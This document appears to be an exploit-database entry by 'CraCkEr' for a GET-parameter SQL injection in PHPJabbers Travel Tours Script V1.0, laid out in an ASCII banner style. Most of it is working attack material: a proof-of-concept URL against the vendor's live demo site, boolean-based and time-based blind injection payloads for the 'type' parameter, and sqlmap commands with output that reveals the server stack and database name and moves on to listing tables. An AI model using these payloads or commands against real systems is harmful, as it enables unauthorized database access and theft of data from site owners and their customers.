## https://sploitus.com/exploit?id=1337DAY-ID-37844
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Exploits ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr โ โ :
โ Website : phpjabbers.com โ โ โ
โ Vendor : PHPJABBERS โ โ Travel Tours Script โ
โ Software : Travel Tours Script V1.0 โ โ โ
โ Vuln Type: Remote SQL Injection โ โ A content management solution for โ
โ Method : GET โ โ travel agencies and tour operators โ
โ Critical : High [โโโโโโโโ] โ โ โ
โ Impact : Database Access โ โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ B4nks-NET irc.b4nks.tk #unix โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ Typically used for remotely exploitable vulnerabilities that can lead to โ
โ system compromise. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ Exploit URL's โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Live Demo Site:
https://www.phpjabbers.com/travel-tours-script/#sectionDemo
POC:
https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]
GET parameter 'type' is vulnerable
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206
---
[+] Starting the Attack
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
current database: 'pjabbers_demo_vpl'
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast